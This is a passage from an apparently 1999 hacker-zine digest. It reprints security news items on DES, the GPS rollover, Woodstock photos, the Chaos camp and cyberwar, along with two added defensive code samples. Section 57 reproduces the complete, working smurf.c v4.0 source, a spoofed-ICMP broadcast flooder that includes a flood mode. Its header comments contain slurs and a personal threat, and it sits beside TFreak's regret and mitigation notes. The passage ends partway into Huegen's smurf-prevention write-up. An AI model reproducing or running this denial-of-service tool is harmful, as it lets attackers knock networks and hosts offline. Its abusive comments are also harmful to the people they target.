51.0 Germans hold bank liable for using 56 bit encryption.
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      A German court recently decided to hold a bank liable
      for losses in connection with a stolen Eurocheque card
      in part because the 56-bit encryption protecting the
      card was considered "out-of-date and not safe enough."
      Are you still relying on DES to keep your data secure? 

      Asian Technology Information Program - Paragraph 13      
      http://www.atip.or.jp/public/atip.reports.98/atip98.096.html
      

52.0 GPS Date Rollover on Aug 22 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     From HNN http://www.hackernews.com/

      contributed by ph1b3r_m0nk 
      On Aug. 22nd the GPS (Global Positioning System)
      Rollover is scheduled to occur. This rollover happens
      every 1,024 weeks but this will be the first rollover since
      the system went online on Jan. 6th 1980. On Aug. 22nd
      the date counter will return to zero to begin the count
      for the next 1,024 weeks. GPS is utilized within many
      industries such as Satellite tracking, Defense
      Information, Navigation and Geographic Information
      Systems (GIS). Some early GPS units did not take this
      date rollover into account and may be affected.
      (hhhmmmm, I suppose we ought to postpone that
      hiking trip.) 

      National Park Service
      http://www.nps.gov/pub_aff/features/gps_alert.htm
      
      Wired
      http://www.wired.com/news/news/technology/story/21098.html
      
      Navstar GPS Joint Program Office                 
      http://gps.laafb.af.mil
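
      The rollover described above, worked through in code: the broadcast
      week number only counts 0..1023, so a unit that treats it as absolute
      lands back in January 1980 on Aug. 22nd. This is an added example, not
      from HNN or any receiver's firmware; the function names and the
      "not before" reference date used to resolve the ambiguity are assumptions.

```c
#include <stdint.h>
#include <stdio.h>

#define GPS_EPOCH_UNIX 315964800LL /* 1980-01-06 00:00:00, start of GPS week 0 */
#define SECS_PER_WEEK  604800LL
#define WEEK_MODULUS   1024        /* the week counter wraps every 1,024 weeks */

struct ymd { int year, month, day; };

/* Unix seconds (t >= 0) to a calendar date, days-to-civil arithmetic. */
struct ymd civil_from_unix(int64_t t)
{
    int64_t z   = t / 86400 + 719468;
    int64_t era = z / 146097;
    int64_t doe = z - era * 146097;
    int64_t yoe = (doe - doe / 1460 + doe / 36524 - doe / 146096) / 365;
    int64_t doy = doe - (365 * yoe + yoe / 4 - yoe / 100);
    int64_t mp  = (5 * doy + 2) / 153;
    struct ymd r;
    r.day   = (int)(doy - (153 * mp + 2) / 5 + 1);
    r.month = (int)(mp < 10 ? mp + 3 : mp - 9);
    r.year  = (int)(yoe + era * 400 + (r.month <= 2));
    return r;
}

/* Naive unit: trusts the truncated week number as if it were absolute.
 * Leap seconds (the GPS-UTC offset) are ignored throughout this example. */
int64_t gps_naive(unsigned week, unsigned tow)
{
    return GPS_EPOCH_UNIX + (int64_t)(week % WEEK_MODULUS) * SECS_PER_WEEK + tow;
}

/* Rollover-aware unit: picks the first full week number at or after a date
 * the unit knows cannot be in the future of the signal (assumption: e.g. the
 * date its software was built) that matches the broadcast week mod 1024. */
int64_t gps_resolved(unsigned week, unsigned tow, int64_t not_before_unix)
{
    int64_t pivot_week = 0, full;
    if (not_before_unix > GPS_EPOCH_UNIX)
        pivot_week = (not_before_unix - GPS_EPOCH_UNIX) / SECS_PER_WEEK;
    full = pivot_week - pivot_week % WEEK_MODULUS + week % WEEK_MODULUS;
    if (full < pivot_week)
        full += WEEK_MODULUS;
    return GPS_EPOCH_UNIX + full * SECS_PER_WEEK + tow;
}

int main(void)
{
    const int64_t built = 915148800LL;   /* 1999-01-01, constructed pivot */
    unsigned weeks[] = { 1023, 0 };      /* week before and week of rollover */
    size_t i;
    for (i = 0; i < 2; i++) {
        struct ymd n = civil_from_unix(gps_naive(weeks[i], 0));
        struct ymd r = civil_from_unix(gps_resolved(weeks[i], 0, built));
        printf("week %4u  naive %04d-%02d-%02d  resolved %04d-%02d-%02d\n",
               weeks[i], n.year, n.month, n.day, r.year, r.month, r.day);
    }
    return 0;
}
```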
      
53.0 NY Police Face Possible Copyright Violations 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
     
     From HNN http://www.hackernews.com/

      contributed by Space Rogue 
      The New York State Police has turned to the web in an
      effort to track down the alleged vandals who destroyed
      the Woodstock '99 site. The Police posted 10
      photographs of the mayhem that had been taken by the
      Associated Press and asked the public to help identify
      people in the photos. The AP requested the photos be
      removed as soon as they knew about it. 

      Nando Times
      http://www.nandotimes.com/technology/story/body/0,1634,77278-122111-861061-0,00.html
      
      Civic.com
      http://www.civic.com/news/1999/august/civ-woodstock-8-4-99.html
      
      New York State Police Web Site      
      http://www.troopers.state.ny.us/
      
      New York police turn to Web for help in Woodstock crimes 

     Copyright © 1999 Nando Media
     Copyright © 1999 Associated Press
     
     By JOHN KEKIS 
     
     ROME, N.Y. (August 3, 1999 12:00 a.m. EDT http://www.nandotimes.com) - New York State Police are turning to the Internet in an attempt to track
     down thieves and vandals who trashed the Woodstock '99 site. But their use of news photos without permission has raised other legal issues. 
     
     The State Police posted 14 photographs on its Web site, including 10 shot by Associated Press photographers. The AP protested as soon as it
     learned of the unauthorized use. 
     
     The photos show concertgoers breaking into pay phones, tearing down a 3-mile-long "Peace Wall," looting a vendor's truck and robbing an
     automated teller machine. The police ask the public for any additional photos and details of the identities of people shown. 
     
     Sam Boyle, chief of the AP's New York City Bureau, discussed the site with various officials on Monday. 
     
     "We have two concerns - violation of copyright and the journalistic separation from law enforcement," Boyle said. 
     
     The AP photos were put on the state police Web page on Friday, according to M.J. Edelman, Web master for the state police. Monday morning, Lt.
     Jamie Mills of the public information office said the pictures would be taken off the site. 
     
     Boyle then received calls from higher officials asking for permission to keep the pictures up, which he said could not be granted. 
     
     Glenn Valle, chief counsel for the state police, said his review indicated that there may not be an issue of copyright infringement. 
     
     "We don't think that we're violating the copyright or infringing on the copyright in this manner," Valle said. "It was material that was already
     published." 
     
     @HWA
      
      
54.0 Chaos Computer Club: Happy Hacker Campers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Geekstock: German Hackfest
     ~~~~~~~~~~~~~~~~~~~~~~~~~~
     Wired News Report 
     
     3:00 a.m.  30.Jul.99.PDT
     It's Internet World meets the Rainbow Gathering next week when geeks from around the world gather for a three-day camp out near Berlin. 
     
     Sponsored by German hacker group Chaos Computer Club (CCC), the event pits campers against each other in periodic hacking contests and gives
     proto-geeks a chance to see the light of day. 
     
     Pre-registration is already closed for the event, which will take place 6 to 8 August in Altlandsberg, near Berlin. However, according to the CCC site,
     those who want to show up at the event with DM150 (US$82) may slip under the 2,000-people limit. 
     
     The camp will be divided into theme villages, Burning Man style. Participants can choose the village that most represents their talents and interests,
     from lock-picking to re-engineering to cryptography. Intermittent events like the Linux Deathmatch, a competition in which one team tries to hack
     another's network, will liven up bouts of partying, workshopping, and drinking at the CCC Leisure Lounge, and swimming on the nearby lake. 
     
     The CCC will provide electricity and an Ethernet for every tent. Campers are encouraged to bring their own computer equipment and can hook up to
     the specially created CAMPnet network or the Internet in their tents or in the CCC hackcenter. 
     
     The grassroots event discourages press and commercial attendance. Business visitors -- defined in the FAQ as those who are "rich or working for a
     company or government that wants you at the Camp because there is a lot to learn or you have a certain commercial interest" -- are asked to pay
     an increased ticket price of DM1,500 (US$800). 
    
     
     Hackers Happy Campers
     ~~~~~~~~~~~~~~~~~~~~~
     by Steve Kettmann 
     
     3:00 a.m.  7.Aug.99.PDT
     BERLIN -- It takes countless hours cooped up indoors in front of a computer screen to truly appreciate the giddy mood at this weekend's three-day
     Chaos Communication Camp. 
     
     By Friday evening, more than 1,400 hackers, encryptologists, computer visionaries, and assorted geeks had pitched their tents in a scenic lakeside
     field, and more were on their way. 
     
     
     
     An afternoon of workshops gave way to a warm evening of lounging in front of tents, as people pounded away at keyboards and greeted
     acquaintances they had met only via networks or email. 
     
     "It's a way to attach faces to email addresses," said John Gilmore, one of the founders of the San Francisco-based Cypherpunks. "It's a way to say,
     'Hey, I know this person, we've been collaborating for years. Who are you?'" 
     
     Like others at the event, Gilmore was headed in about four directions at once. That's how it goes when you put together thousands of smart,
     passionate people used to the isolated pursuit of their craft. 
     
     Mass hacking, under the stars no less, was one of the activities. It took on an unlikely charm, especially given its location -- in the main tent next
     to a small, polished-silver spacecraft, a "shuttle" to Chaos' Heart of Gold Web site. 
     
     This weekend's three-day event, the first of its kind in Germany, takes as its inspiration Hacking in Progress, a similarly organized hacking and
     technology festival that took place outside of Amsterdam two summers ago. 
     
     "About 10 Cypherpunks went to HIP two years ago, and they came back with so many stories about how fun it was hanging out with people there.
     Also, they finished proofreading and typing in PGP, Pretty Good Privacy, a computer program that does encryption, so there was an international
     version," said Gilmore. 
     
     "I didn't make it to HIP, but I resolved to go to the next one, and here I am. We have 15 or 20 people here, probably more than a dozen from the
     San Francisco Bay Area, and others scattered around from Berlin and Amsterdam and other parts of Europe. It's a real collegial, friendly sort of
     atmosphere. I'm meeting a lot of great people." 
     
     The Berlin-based Chaos Computer Club, which organized the weekend, spent a year preparing for the meeting. That comes through in the
     atmosphere of crisp organization that seems to meld seamlessly with a spirit of fun -- the latter best summed up by comments like, "What's it like?
     I've never done pot before." 
     
     "For me, this is more German than HIP," said Ine Poppe, a Dutch documentary filmmaker and artist who worked HIP as a journalist. "It's better
     organized. They learned a lot from the festivals before. 
     
     "From my point of view, HIP had more of a scene of chaos: tents close together and cables all over the place and dance parties into the night.
     Maybe we will have those later." 
     
     Kurt Seifried, a 22-year-old from Edmonton, Alberta, was roaming around the Cypherpunk tent with the exultant air of a student wrapping up finals
     week. 
     
     "I gave a talk during one of the workshops and they didn't throw beer cans at me, so I guess it went all right," he said. "It was my first public
     speaking experience, so it was kind of scary. 
     
     "The worst part was, they canceled the other workshop scheduled for the same time, so I looked up and about 100 people were streaming into the
     tent wanting to be entertained. It was like something out of Pink Floyd's The Wall." 
     
     Seifried's area of expertise is security, the yin to cracking's yang. His 177-page guide to Linux security is posted on the Web. 
     
     "It's encryption at network level to secure things, because right now the Internet is wide open, as people know. I came here to do that, and to
     network a little," he said. 
     
     Yet after the hacking and networking comes the relaxing, and the face-to-face conversations.       
           
     @HWA
     
55.0 Hackers and Cyberwar "The Threat of Chaos "     
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Hacker Sitings and News

     8/7/99

     Cyberwar: The Threat of Chaos 
       
     Hackers can disrupt, but can they make war?

     Hackers and other cyber-vandals have become a major threat as the world's
     powers rely increasingly on their computers.

     By Bob Sullivan
     MSNBC
                       
                                                                       
                         
            "WE HAVE NOTHING to fear but fear itself," offered
     Franklin Roosevelt during the throes of the Great
     Depression. He might also have been talking about the
     Information Age, where the power of personal computers
     seems to offer limitless possibilities for both creativity and
     destruction. 
            Not true, the experts say -- there are limits to the
     damage that can be done with zeros and ones. 
            Experts like those at Bell Laboratories in New Jersey
     insist that image of a pimply-faced geek gaining control of
     Defense Department computers is pure science fiction. Even
     an organized "hack" by well-funded terrorist organizations
     who take control of a nuclear missile facility is fanciful, they
     say -- and hardly worth the trouble. Not when it would be
     so much easier to create equal havoc using much simpler
     methods. 
            
     THINKING SMALL 
     
     "We are the most technologically advanced country
      in the world, which means we have the most to lose." 
                 
                 -- FRANK CILLUFFO
                    Information warfare
                    specialist 
                    
                    
            Imagine, for example, if the Internet suddenly stopped
     working. A hacker group told Congress it could be done in
     half an hour. Or if power to major cities were disrupted.
     Government-hired hackers did that in four days in 1997. Or
     if parts of the 911 system were cut off. A Swedish hacker
     now in an asylum managed briefly to cut off 911 service in
     Florida two years ago. 
            Such "nuisance" hacks on infrastructure are less
     dramatic than the hijacking of a missile, but they might be
     more effective.
            "The psychological impacts of IW (information
     warfare) can't be overstated," said Frank Cilluffo, director
     of the Information Warfare Task Force at the Center for
     Strategic and International Studies. "Using it, terrorist
     groups can achieve what they cannot militarily.
            "We are the most technologically advanced country in
     the world, which means we have the most to lose," he
     added. "The United States is not very prepared to lose
     power, for example. And how long can you live without that
     database? What if suddenly all e-commerce were cut off?" 
                                                   
            
     TARGETING FINANCE
            Throw banking into that e-commerce category. During
     the Kosovo conflict, numerous reports suggested U.S.
     intelligence agencies had hired hackers to tinker with
     international bank accounts full of Yugoslav President
     Slobodan Milosevic's money. There was plenty of debate in
     the security community about how possible this might be,
     but even the idea sent shudders through the financial
     industry. Once that Pandora's box is open -- once one
     government's hackers are capable of freezing or altering
     personal bank account information -- other governments
     and terrorist organizations surely would follow suit. And
     since the entire banking system is based on confidence, such
     an attack could completely undermine the integrity of the
     banking system, according to Kawika Daguio, executive
     vice president of the Financial Information Protection
     Association. 
            
     THE MULTIPLIER EFFECT
            Cilluffo's biggest concern is not an all-digital attack, but
     the use of computers as a multiplier for a more traditional
     attack. Imagine if a hacker had disabled 911 during the
     Oklahoma City bombing in 1995. Not only would medical
     help have been severely delayed, leading to more death and
     destruction -- the resulting confusion would at least be
     demoralizing and, at worst, create a panic.
            For proof of the potential for mob psychology, experts
     point to the Y2K bug. Even with several years' warning and
     continuous announcements that computers are
     Y2K-compliant, banks report cash hoarding has already
     begun, and survivalist-minded individuals are squirreling
     away water and dry goods.
            "The actual problem is usually 10 times less damaging
     than the public perception of it," said Space Rogue, who
     runs the Hacker News Network service. 
            
     The threat: real or not?
            There's plenty of debate about how severe the
     cyberthreat is, though recent signals from the U.S.
     government suggest federal agencies are taking it very
     seriously. 
            Just last week, The New York Times was leaked a
     document showing the National Security Council is working
     on a Big Brother-like electronic monitoring system called
     the "Federal Intrusion Detection Network." 
            The plan's director told the Times: "We know" foreign
     governments are developing cyberwar capabilities, and "we
     have good reason to believe that terrorists may be
     developing similar capabilities." 
            
     ELIGIBLE RECEIVER
            The National Security Agency's 1997 cyberwar "fire
     drill" may have inspired the study. In a military exercise
     code-named "Eligible Receiver," 35 hackers hired by the
     NSA gained access to 36 of the 40,000 government
     networks within four days. They were able to gain control
     of major power grids and could have disrupted power in
     Los Angeles, Chicago, Washington and New York.
            But nothing nearly so sophisticated is required. In
     testimony to Congress last year, members of the hacker
     group L0pht said they could bring the Internet to its knees in
     less than an hour.
            "It is not difficult at all to fool, confuse or corrupt major
     [domain name] servers," Dr. Mudge, who testified to
     Congress, told MSNBC. "There are many more interesting
     attacks that could be much more devastating, dealing with
     disrupting routing between major tier-one service providers
     (that is, stopping MCI from being able to talk to Sprintnet,
     etc.) and is completely feasible, doable with very little
     effort."
            And the number of technologies that might be turned
     against the United States continues to expand with each
     high-tech invention, say several scientists at U.S. high-tech
     labs. Among the most frightening are the advent of MEMS
     -- micro-electro-mechanical systems. These tiny machines,
     potentially smaller than a human cell, may one day be
     injected into the bloodstream as miniature doctors sent to
     beat back viruses or kill cancerous cells. But they could just
     as easily be designed as a lethal combination of high-tech
     and biological warfare, as smart MEMS could be set to
     infect and kill specific kinds of subjects. 
            
     Irrational fears?
            Not everyone is persuaded the threat is all that
     dramatic. After all, hackers did not gain access to the
     Pentagon's most secure systems. InfoWar.com founder
     Louis Cipher (a pseudonym) says Eligible Receiver and
     other high-profile cyber-threat incidents are part publicity
     stunt aimed at getting more federal money targeted to
     cyberwarfare research.
            "Paranoia is a bad thing, and America is being infected
     quickly," Cipher said. "Everybody's an alarmist.... You can
     disturb an infrastructure. Can go into telephony and can
     cause disturbance, a denial of service. But disturbing
     electrical facilities is difficult. Just like on a railroad, they can
     go from track to track. There are a lot of safeguards."
            And despite all the conjecture about cyberwar
     capabilities, there's little evidence it has actually been used.
     In fact, even if the ability to take out power grids with a
     computer is out there, U.S. forces apparently showed a
     distinct reluctance to use the ability during the Kosovo
     conflict. So-called "soft bombs," which short out electric
     lines, were used to create local power disruptions instead of
     a computer-based attack.
            That satisfies Cilluffo, who thinks the United States
     should hold off crossing the line to cyberwar for as long as
     possible. 
            "A well-placed bomb may still be easier," Cilluffo said.
     "If we can go through physical means, then we are not
     compromising a technique that could be used against us....
     After all, we have a lot more to lose."
            
     Bob Sullivan covers Internet issues for MSNBC.com
     
     @HWA
                                 
56.0 LOCKDOWN 2000
     ~~~~~~~~~~~~~
      
      From http://www.net-security.org/
      
      by BHZ, Saturday 7th August 1999 on 4:50 pm CET
      New version of Lockdown 2000 has been released - Lockdown 2000 3.0.1.31. In this
      version some bugs are repaired (this build fixes all error messages that some
      Windows 95/98 users had on close and shutdown, fixes the manual scanner bug and
      many more new trojan signatures are added - the current number of trojan versions
      which it detects is 301). More information on the website (www.lockdown2000.com). 
                                                                       
     @HWA
     
           

57.0 The SMURF attack and smurf amplifiers
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Contrary to popular belief SMURF attacks are still very much in use and a threat to ISPs as well as users
     alike. The reason for this is that no matter how much you yell certain badly maintained networks STILL 
     continue to act as SMURF AMPLIFIERS. A plain smurf basically elicits a ping response from several hundred
     machines with a spoofed address and a target return address, a SMURF AMPLIFIER responds more than once to
     the ping, in some cases several (as many as 10 or more) times. These nets are targeted by the smurfer 
     for their use against the target site... here's a brief description of smurfs and a list of networks that 
     are acting as smurf amplifiers as of this writing with urls on where to go to find current stats. - Ed
     
     
     
     SMURF.C by TFreak
     
     Well, I suppose it's `safe' to release this, it seems everyone and their dog has
     it and apparently (and to my surprise) it still works.
     
     The `smurf' attack is quite simple.  It has a list of broadcast addresses which
     it stores into an array, and sends a spoofed icmp echo request to each of those
     addresses in series and starts again.  The result is a devastating attack upon
     the spoofed ip with, depending on the amount of broadcast addresses used,
     many, many computers responding to the echo request.
     
     Before I continue may I first say that this code was a mistake.  When it was
     written I was not aware of the fact that a) the world would get its hands on it
     and b) it would have such a destructive effect on the computers being used to
     flood.  My ignorance is my mistake.  I extremely regret writing this, but as
     you well know, if things aren't `exploited' then they aren't fixed.
     
     Now that that's cleared up, how do you protect your network?  Well,
     unfortunately I am not sure how or even if it is possible to protect yourself
     from being hit with it, unless you wanted to deny all incoming icmp traffic at
     the router which isn't the best solution as it renders other useful oddities
     (such as ping and traceroute) unusable.  To prevent your network from being
     used to flood (using up almost all your bandwidth therefore creating a denial
     of service upon yourself.. technically) is quite easy and not a great loss to
     your network.  If you filter all incoming icmp traffic to the broadcast address
     at the router none of the machines will respond therefore the attack will not
     work.  This can be done with one line in the router, and I believe a rep from
     texas.net posted the solution for this (perhaps it could be reposted?).
     
     I believe MCI is currently working on a patch or detector of some kind for it,
     which is available at
             http://www.internetnews.com/isp-news/1997/10/0901-mci.html
     
     Please, patch your networks, if there's nothing to flood with then there's no
     flood.
     
     Respectfully,
     
     TFreak
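
     The router-side rule from the letter above (drop incoming ICMP whose
     destination is a broadcast address), written out as a classification
     function. This is an added example, not part of TFreak's post or of
     smurf.c; the subnet table, structs and function names are assumptions,
     and the addresses are constructed from documentation ranges. It treats
     the all-zeros host address as a broadcast too, as older BSD stacks did.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PROTO_ICMP 1
#define PROTO_UDP  17
#define IP4(a, b, c, d) (((uint32_t)(a) << 24) | ((uint32_t)(b) << 16) | \
                         ((uint32_t)(c) << 8) | (uint32_t)(d))

struct subnet { uint32_t network; unsigned prefix_len; };
struct packet { uint32_t src, dst; uint8_t proto; };

enum verdict { FORWARD = 0, DROP_ICMP_BROADCAST = 1 };

static uint32_t netmask(unsigned prefix_len)
{
    return prefix_len == 0 ? 0u : 0xFFFFFFFFu << (32 - prefix_len);
}

/* 1 if dst is the limited broadcast, or the all-ones / all-zeros host
 * address of one of the subnets behind this router. The test is done
 * per subnet mask: "ends in .255" is neither necessary nor sufficient. */
int is_broadcast_dst(uint32_t dst, const struct subnet *nets, size_t n)
{
    size_t i;
    if (dst == 0xFFFFFFFFu)
        return 1;
    for (i = 0; i < n; i++) {
        uint32_t mask = netmask(nets[i].prefix_len);
        uint32_t host = dst & ~mask;
        if (nets[i].prefix_len >= 31)          /* no broadcast address */
            continue;
        if ((dst & mask) != (nets[i].network & mask))
            continue;
        if (host == (uint32_t)~mask || host == 0)
            return 1;
    }
    return 0;
}

/* The filter itself: only ICMP aimed at a broadcast address is dropped,
 * so ping and traceroute to individual hosts keep working. */
enum verdict classify(const struct packet *p, const struct subnet *nets, size_t n)
{
    if (p->proto == PROTO_ICMP && is_broadcast_dst(p->dst, nets, n))
        return DROP_ICMP_BROADCAST;
    return FORWARD;
}

size_t count_dropped(const struct packet *pkts, size_t npkts,
                     const struct subnet *nets, size_t n)
{
    size_t i, dropped = 0;
    for (i = 0; i < npkts; i++)
        dropped += classify(&pkts[i], nets, n) == DROP_ICMP_BROADCAST;
    return dropped;
}

/* Constructed sample data (hypothetical networks and traffic). */
static const struct subnet SAMPLE_NETS[] = {
    { IP4(192, 0, 2, 0),    24 },
    { IP4(198, 51, 100, 64), 26 },
    { IP4(10, 1, 0, 0),     22 },
};
static const struct packet SAMPLE_PKTS[] = {
    { IP4(203, 0, 113, 9), IP4(192, 0, 2, 255),    PROTO_ICMP }, /* /24 broadcast */
    { IP4(203, 0, 113, 9), IP4(192, 0, 2, 17),     PROTO_ICMP }, /* plain host    */
    { IP4(203, 0, 113, 9), IP4(198, 51, 100, 127), PROTO_ICMP }, /* /26 broadcast */
    { IP4(203, 0, 113, 9), IP4(10, 1, 2, 255),     PROTO_ICMP }, /* host in a /22 */
    { IP4(203, 0, 113, 9), IP4(10, 1, 3, 255),     PROTO_ICMP }, /* /22 broadcast */
    { IP4(203, 0, 113, 9), IP4(192, 0, 2, 0),      PROTO_ICMP }, /* all-zeros     */
    { IP4(203, 0, 113, 9), IP4(192, 0, 2, 255),    PROTO_UDP  }, /* not ICMP      */
};

int main(void)
{
    size_t i, n = sizeof SAMPLE_PKTS / sizeof SAMPLE_PKTS[0];
    for (i = 0; i < n; i++) {
        uint32_t d = SAMPLE_PKTS[i].dst;
        printf("%u.%u.%u.%u proto %u -> %s\n", (unsigned)(d >> 24),
               (unsigned)(d >> 16) & 255u, (unsigned)(d >> 8) & 255u,
               (unsigned)d & 255u, (unsigned)SAMPLE_PKTS[i].proto,
               classify(&SAMPLE_PKTS[i], SAMPLE_NETS, 3) ? "DROP" : "forward");
    }
    return 0;
}
```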
     
     --- 8< smurf4.c >8 ---
     
     /*
      *
      *  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
      *
      *  spoofs icmp packets from a host to various broadcast addresses resulting
      *  in multiple replies to that host from a single packet.
      *
      *  mad head to:
      *     nyt, soldier, autopsy, legendnet, #c0de, irq for being my guinea pig,
      *     MissSatan for swallowing, napster for pimping my sister, the guy that
      *     invented vaseline, fyber for trying, knowy, old school #havok, kain
      *     cos he rox my sox, zuez, toxik, robocod, and everyone else that i might
      *     have missed (you know who you are).
      *
      *     hi to pbug, majikal, white_dragon and chris@unix.org for being the sexy
      *     thing he is (he's -almost- as stubborn as me, still i managed to pick up
      *     half the cheque).
      *
      *     and a special hi to Todd, face it dude, you're fucking awesome.
      *
      *  mad anal to:
      *     #madcrew/#conflict for not cashing in their cluepons, EFnet IRCOps
      *     because they plain suck, Rolex for being a twit, everyone that
      *     trades warez, Caren for being a lesbian hoe, AcidKill for being her
      *     partner, #cha0s, sedriss for having an ego in inverse proportion to
      *     his penis and anyone that can't pee standing up -- you don't know what
      *     your missing out on.
      *
      *     and anyone thats ripped my code (diff smurf.c axcast.c is rather
      *     interesting).
      *
      *     and a HUGE TWICE THE SIZE OF SOLDIER'S FUCK TO AMM FUCK YOU to Bill
      *     Robbins for trying to steal my girlfriend.  Not only did you show me
      *     no respect but you're a manipulating prick who tried to take away the
      *     most important thing in the world to me with no guilt whatsoever, and
      *     for that I wish you nothing but pain.  Die.
      *
      *  disclaimer:
      *     I cannot and will not be held responsible nor legally bound for the
      *     malicious activities of individuals who come into possession of this
      *     program and I refuse to provide help or support of any kind and do NOT
      *     condone use of this program to deny service to anyone or any machine.
      *     This is for educational use only. Please Don't abuse this.
      *
      *  Well, i really, really, hate this code, but yet here I am creating another
      *  disgusting version of it.  Odd, indeed.  So why did I write it?  Well, I,
      *  like most programmers don't like seeing bugs in their code.  I saw a few
      *  things that should have been done better or needed fixing so I fixed
      *  them.  -shrug-, programming for me as always seemed to take the pain away
      *  ...
      *
      *
      */
     
     #include <signal.h>
     #include <stdio.h>
     #include <stdlib.h>
     #include <sys/socket.h>
     #include <sys/types.h>
     #include <netinet/in.h>
     #include <netinet/ip.h>
     #include <netinet/ip_icmp.h>
     #include <netdb.h>
     #include <ctype.h>
     #include <arpa/inet.h>
     #include <unistd.h>
     #include <string.h>
     
     void banner(void);
     void usage(char *);
     void smurf(int, struct sockaddr_in, u_long, int);
     void ctrlc(int);
     unsigned short in_chksum(u_short *, int);
     
     /* stamp */
     char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
     
     int main (int argc, char *argv[])
     {
        struct sockaddr_in sin;
        struct hostent *he;
        FILE   *bcastfile;
        int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;
        char   buf[32], **bcastaddr = malloc(8192);
     
        banner();
        signal(SIGINT, ctrlc);
     
        if (argc < 6) usage(argv[0]);
     
        if ((he = gethostbyname(argv[1])) == NULL) {
           perror("resolving source host");
           exit(-1);
        }
        memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
        sin.sin_family = AF_INET;
        sin.sin_port = htons(0);
     
        num = atoi(argv[3]);
        delay = atoi(argv[4]);
        pktsize = atoi(argv[5]);
     
        if ((bcastfile = fopen(argv[2], "r")) == NULL) {
           perror("opening bcast file");
           exit(-1);
        }
        x = 0;
        while (!feof(bcastfile)) {
           fgets(buf, 32, bcastfile);
           if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
           for (i = 0; i < strlen(buf); i++)
               if (buf[i] == '\n') buf[i] = '\0';
           bcastaddr[x] = malloc(32);
           strcpy(bcastaddr[x], buf);
           x++;
        }
        bcastaddr[x] = 0x0;
        fclose(bcastfile);
     
        if (x == 0) {
           fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
           exit(-1);
        }
        if (pktsize > 1024) {
           fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
           exit(-1);
        }
     
        if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
           perror("getting socket");
           exit(-1);
        }
        setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
     
        printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
     
        for (i = 0; i < num || !num; i++) {
           if (!(i % 25)) { printf("."); fflush(stdout); }
           smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
           cycle++;
           if (bcastaddr[cycle] == 0x0) cycle = 0;
           usleep(delay);
        }
        puts("\n\n");
        return 0;
     }
     
     void banner (void)
     {
        puts("\nsmurf.c v4.0 by TFreak\n");
     }
     
     void usage (char *prog)
     {
        fprintf(stderr, "usage: %s <target> <bcast file> "
                        "<num packets> <packet delay> <packet size>\n\n"
                        "target        = address to hit\n"
                        "bcast file    = file to read broadcast addresses from\n"
                        "num packets   = number of packets to send (0 = flood)\n"
                        "packet delay  = wait between each packet (in ms)\n"
                        "packet size   = size of packet (< 1024)\n\n", prog);
        exit(-1);
     }
     
     void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
     {
        struct iphdr *ip;
        struct icmphdr *icmp;
        char *packet;
     
        packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
        ip = (struct iphdr *)packet;
        icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
     
        memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
     
        ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
        ip->ihl = 5;
        ip->version = 4;
        ip->ttl = 255;
        ip->tos = 0;
        ip->frag_off = 0;
        ip->protocol = IPPROTO_ICMP;
        ip->saddr = sin.sin_addr.s_addr;
        ip->daddr = dest;
        ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
        icmp->type = 8;
        icmp->code = 0;
        icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);
     
        sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
               0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
     
        free(packet);           /* free willy! */
     }
     
     void ctrlc (int ignored)
     {
        puts("\nDone!\n");
        exit(1);
     }
     
     unsigned short in_chksum (u_short *addr, int len)
     {
        register int nleft = len;
        register int sum = 0;
        u_short answer = 0;
     
        while (nleft > 1) {
           sum += *addr++;
           nleft -= 2;
        }
     
        if (nleft == 1) {
           *(u_char *)(&answer) = *(u_char *)addr;
           sum += answer;
        }
     
        sum = (sum >> 16) + (sum + 0xffff);
        sum += (sum >> 16);
        answer = ~sum;
        return(answer);
     }
     
     
     
     
     
     
     
     --------------------------------------------------------------------------------
     
     
     Along these same lines, Craig Huegen has written up some documentation that
     gives an in-depth explanation of smurfing and prevention measures at
     http://www.quadrunner.com/~c-huegen/smurf.txt
     
     From the web page:
     ---------------------------------------------------
     THE LATEST IN DENIAL OF SERVICE ATTACKS: "SMURFING"
     DESCRIPTION AND INFORMATION TO MINIMIZE EFFECTS
     
     Craig A. Huegen
     chuegen@quadrunner.com
     
     Last Update: Fri Oct 10 12:20 PDT
     
     New additions:
     * More minor corrections
     * Added MCI's DoSTracker program (announced at N+I 10/9/97)
     * Changed "helpers" to "bounce sites" (kcooper@bbnplanet.com)
     * Added preliminary information about Bay Networks routers
       (jcgreen@netins.net)
     * Added further information about Proteon/OpenROUTE routers
       (dts@senie.com)
     
     Editor's plea: *please* distribute this information freely, and abide by
     my redistribution requirements (see the very end) when doing so.  It's
     important that these attacks be minimized, and communication is the only
     way to help with this.
     
     OVERVIEW:
     
     The information here provides in-depth information regarding "smurf"
